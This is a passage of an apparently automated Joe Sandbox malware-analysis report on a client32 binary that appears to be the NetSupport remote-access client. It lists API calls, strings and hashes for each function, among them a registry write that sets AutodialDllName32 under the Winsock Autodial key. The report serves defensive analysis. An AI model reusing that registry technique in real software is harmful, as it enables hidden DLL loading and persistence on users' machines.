e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 110B31BF
IsA(), xrefs: 110B318C, 110B31C4, 110B31EA, 110B3210, 110B3262, 110B3288

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$AppendCreateErrorExitLastMessageProcess_freewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\IEFavourites.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
API String ID: 1956547959-127113396
Opcode ID: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
Instruction ID: 1b6c63c24338c86407ebd4c0ec086c5d3198c705a6e80d99f4d3243e9f46137b
Opcode Fuzzy Hash: ae0daca5e524887d6045aa3093877d1e47d145438e00f3db79d2cd643436765f
Instruction Fuzzy Hash: 33518C7DA08606ABCB25CF55DC80F9EF3B4FF48718F208658ED2567780DB31A905CAA1

Function 1101D9C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101DA31

Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101DB45
GetSaveFileNameA.COMDLG32(?), ref: 1101DB67
_fputs.LIBCMT ref: 1101DB93

Strings

X, xrefs: 1101DA41
ChatPath, xrefs: 1101DB21

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: c76ffc7a8a1f411bc2a4051b2bea01b2e7ad76f31f6930a5685257cbcd7c3c5c
Instruction ID: f46f000f097f2426975ef266168476f15196107d4a37200cfb9d643cc87cbaca
Opcode Fuzzy Hash: c76ffc7a8a1f411bc2a4051b2bea01b2e7ad76f31f6930a5685257cbcd7c3c5c
Instruction Fuzzy Hash: 8451B275E043199FEB20DB60CC88BDEBBB4BF45308F4042D9D9496B284EB75AA44CF90

Function 1100F950 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F966

Part of subcall function 1114EEB0: std::exception::exception.LIBCMT ref: 1114EEC5
Part of subcall function 1114EEB0: __CxxThrowException@8.LIBCMT ref: 1114EEDA
Part of subcall function 1114EEB0: std::exception::exception.LIBCMT ref: 1114EEEB

std::_Xinvalid_argument.LIBCPMT ref: 1100F97C
std::_Xinvalid_argument.LIBCPMT ref: 1100F997
_memmove.LIBCMT ref: 1100FA02

Strings

invalid string position, xrefs: 1100F961
string too long, xrefs: 1100F977, 1100F992

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 8c45978606a06d058d867b3bb20ba712f21edff386b6f777b3d7a0adae0a303c
Instruction ID: c66ad4dea58d97f920030bcdba79163b0917aafbd8006542e99bb4fcf0cd6de0
Opcode Fuzzy Hash: 8c45978606a06d058d867b3bb20ba712f21edff386b6f777b3d7a0adae0a303c
Instruction Fuzzy Hash: B331FD32B046109FF315DE5CDC80E9EF7E9EF916A4B204A2EF491C7680CB70AC4597A1

Function 1105F0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?), ref: 1105F10E
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Services\Winsock\Autodial,00000000,00000000,00000000), ref: 1105F136
RegSetValueExA.ADVAPI32(00000000,AutodialDllName32,00000000,?,111D92E1,00000010), ref: 1105F220
RegCloseKey.ADVAPI32(00000000), ref: 1105F22D

Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

Strings

AutodialDllName32, xrefs: 1105F178, 1105F1DE, 1105F21A
System\CurrentControlSet\Services\Winsock\Autodial, xrefs: 1105F12C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Value$CloseOpenQueryVersion
String ID: AutodialDllName32$System\CurrentControlSet\Services\Winsock\Autodial
API String ID: 387276457-2283657482
Opcode ID: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
Instruction ID: e4c3f3aff344711777e9417e9598a4d17be5596ef11d057f72070e3f7c066d2f
Opcode Fuzzy Hash: a3b138f78b095ecd2dd4f2ceb670666107fbd6ca84dad05e8fdd868d7ed900a2
Instruction Fuzzy Hash: C131A379E0021D9FDF60CF54CC88FADF7BAAB45308F4080D9E848A2141E7746A45CF52

Function 11055010 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85timeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,2F623E72,75092AF0,00000001,000000C8,110554E5,?,?,00000000,?,?), ref: 11055068
timeGetTime.WINMM ref: 1105509B

Part of subcall function 11131740: _strncpy.LIBCMT ref: 11131782

SetEvent.KERNEL32(?), ref: 110550E4
LeaveCriticalSection.KERNEL32(?), ref: 110550EB

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Strings

gMain.pReconnThread, xrefs: 11055051
CltReconn.cpp, xrefs: 1105504C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
String ID: CltReconn.cpp$gMain.pReconnThread
API String ID: 3397837340-2390197369
Opcode ID: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
Instruction ID: 951eb923e7c686365c6e5888714639626bc13f8e8268a3ec29750d4fc865e335
Opcode Fuzzy Hash: b682c9cf606a3662c13bb09a8953d970b76c9c428edd8b2ecbfa41850f18c41f
Instruction Fuzzy Hash: 2A317FB6D006159FCB51CFA8D880B9EFBF8FB48718F10856AE916E7244D775A900CBE1

Function 110AF0C0 Relevance: 10.6, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 110AF0F2
GetSystemMetrics.USER32(0000004D), ref: 110AF0F9
GetSystemMetrics.USER32(0000004E), ref: 110AF100
GetSystemMetrics.USER32(0000004F), ref: 110AF107
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110AF116
GetSystemMetrics.USER32(?), ref: 110AF124
GetSystemMetrics.USER32(00000001), ref: 110AF133

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameters
String ID:
API String ID: 3136151823-0
Opcode ID: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
Instruction ID: 7c71a874cc683e3bf2dee40a1eb1ca687fcdd4ea94523516a10deac17ed6ea0e
Opcode Fuzzy Hash: bf5e026fc6f2f8d516ea3f6301bb30ff143f875d1c1b2847ac3ef235195643f8
Instruction Fuzzy Hash: 41310771E0030A9FCB14DFE9C881AAEFBF5AF88700F20842EE519A7380D674A841CF54

Function 110959A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110959BF
GetClassNameA.USER32(?,?,00000040), ref: 110959D0
FindWindowA.USER32(?,00000000), ref: 11095A11
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,11096BBE,000001F4,00000000,?,110F8C82), ref: 11095A2C
FindWindowA.USER32(?,00000000), ref: 11095A3D

Strings

gfff, xrefs: 110959EA

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$ClassNameSleep
String ID: gfff
API String ID: 1867012073-1553575800
Opcode ID: 04d505a386dbb911df04f96a2fba16fc3a89ff931bd4592c58b75d3ee9b0607f
Instruction ID: 0447acd80a0692b2ccb1bff788da9c3a0bc4c3668079b60f62a47d9541818bb8
Opcode Fuzzy Hash: 04d505a386dbb911df04f96a2fba16fc3a89ff931bd4592c58b75d3ee9b0607f
Instruction Fuzzy Hash: 842101B3E016199FC701CEAAC8D5A9EFBE8BF44754B05412AEC05E7300DB35E9029BA1

Function 1103F120 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 1103F1C5

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

transferred == datalen, xrefs: 1103F1A5
Error %d writing to smartcard device, xrefs: 1103F1CC
r>b/, xrefs: 1103F14E
Written %u bytes to smartcard device, xrefs: 1103F1B6
CLTCONN.CPP, xrefs: 1103F1A0
NO VALID SMARTCARD DEVICE!!!, xrefs: 1103F1DB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ExitMessageProcesswsprintf
String ID: CLTCONN.CPP$Error %d writing to smartcard device$NO VALID SMARTCARD DEVICE!!!$Written %u bytes to smartcard device$r>b/$transferred == datalen
API String ID: 73808336-1749679423
Opcode ID: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
Instruction ID: d1e1036eaa595ab7b5070c6635154fdad5e0fb19e25623191bbb8a120220dee9
Opcode Fuzzy Hash: 94856a4078b3ac11fe05ef5c0c08bd18a798151c73576af9460396963e9f6036
Instruction Fuzzy Hash: 3821B0B6900509AFCB00CF54ED41FDEF775EB95729F008269FC1567380EB30AA04CAA2

Function 11151524 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11151532

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

_free.LIBCMT ref: 11151545

Strings

r>b/, xrefs: 1115153B, 1115152F, 11151557, 11151577, 11151587

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID: r>b/
API String ID: 1020059152-849169389
Opcode ID: acb3da9910b6cb5f4e272841fa2a091c0c58cfe95cb9ae9140bf514443b35c3d
Instruction ID: 35b369d0f5c4220ee84277d88253d6fdcb9dc3b21ba59b57d6bf339a69f5eb09
Opcode Fuzzy Hash: acb3da9910b6cb5f4e272841fa2a091c0c58cfe95cb9ae9140bf514443b35c3d
Instruction Fuzzy Hash: 8B110A37410623ABCBD32F74980465EFB9AAF472BCF594525F83AC7180DF3499418791

Function 110055D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 1100560D
BeginPaint.USER32(?,?), ref: 11005618
BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100563A
EndPaint.USER32(?,?), ref: 1100565F

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110055F3
m_hWnd, xrefs: 110055F8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 1216912278-1557312927
Opcode ID: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
Instruction ID: 9d934249f53fa8d366fcc49e738241deeb513e329cffd45cc01f0ae030ad81d4
Opcode Fuzzy Hash: 97d3c940d63b297fb10f83f3dfb68609f49cd421d87f9b9cd799dfe9b4fbcbfc
Instruction Fuzzy Hash: 3E118F76A00614BFE711CBA0CC85FAEF3BCEB88704F108129F50697180EA70B904CB65

Function 1100B270 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B280
EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8

Part of subcall function 1100A1E0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1FE
Part of subcall function 1100A1E0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A228
Part of subcall function 1100A1E0: GetLastError.KERNEL32 ref: 1100A230
Part of subcall function 1100A1E0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A244
Part of subcall function 1100A1E0: CloseHandle.KERNEL32(00000000), ref: 1100A24B

waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
_free.LIBCMT ref: 1100B2F8
_free.LIBCMT ref: 1100B2FE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
Instruction ID: b53c431c1fdfdfa32c825fd1fca90191d00be8cf6b766cb547cd0a2bc680ebd8
Opcode Fuzzy Hash: 58f407269e751de9f91f6fa657191078a7fc4bd98738b10eb03c05d2ca273642
Instruction Fuzzy Hash: 4211827A900B15AFE712CE60DC88BEFB3ACEF4A399F004529FA2656140D770B541CB61

Function 110AF330 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 110AF354
GetSubMenu.USER32(00000000,00000002), ref: 110AF35D
GetMenuItemCount.USER32(00000000), ref: 110AF366
DeleteMenu.USER32(00000000,00000000,00000400,00000000,00000000,?,?,?,110B3F22,75A77C34,?), ref: 110AF388

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
